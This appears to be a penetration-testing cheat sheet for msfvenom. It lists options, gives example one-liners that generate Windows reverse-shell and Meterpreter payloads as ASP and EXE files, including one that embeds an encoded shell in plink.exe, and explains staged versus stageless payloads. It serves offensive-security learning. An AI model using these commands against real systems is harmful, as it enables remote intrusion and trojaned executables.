Command Options

-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
MSFvenom | Offensive Security

Examples of Usage

msfvenom -l payloads | grep x86
# List paylaods
msfvenom -p windows/shell_reverse_tcp --list-options
# Display paylaod options
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f asp -o tcp_shell.asp
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST= LPORT=1234 -f exe -o tcp_shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe -o shell_reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f exe -o met_https_reverse.exe

List of commonly used payloads


Staged vs Stageless payloads

Staged payloads are denoted with the use of a forward slash (/; e.g. windows/shell/reverse_tcp). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as multi/handler in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day)
Stageless payloads are denoted with the use of an underscore (_; e.g. windows/shell_reverse_tcp). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post here.
Offensive Msfvenom: From Generating Shellcode to Creating Trojans
Msfvenom Tutorials for Beginners - Hacking Articles
Hacking Articles
Generating Reverse Shell using Msfvenom (One Liner Payload) - Hacking Articles
Hacking Articles
How to use msfvenom · rapid7/metasploit-framework Wiki
Creating Metasploit Payloads
Copy link
On this page
Command Options
Examples of Usage
List of commonly used payloads
Staged vs Stageless payloads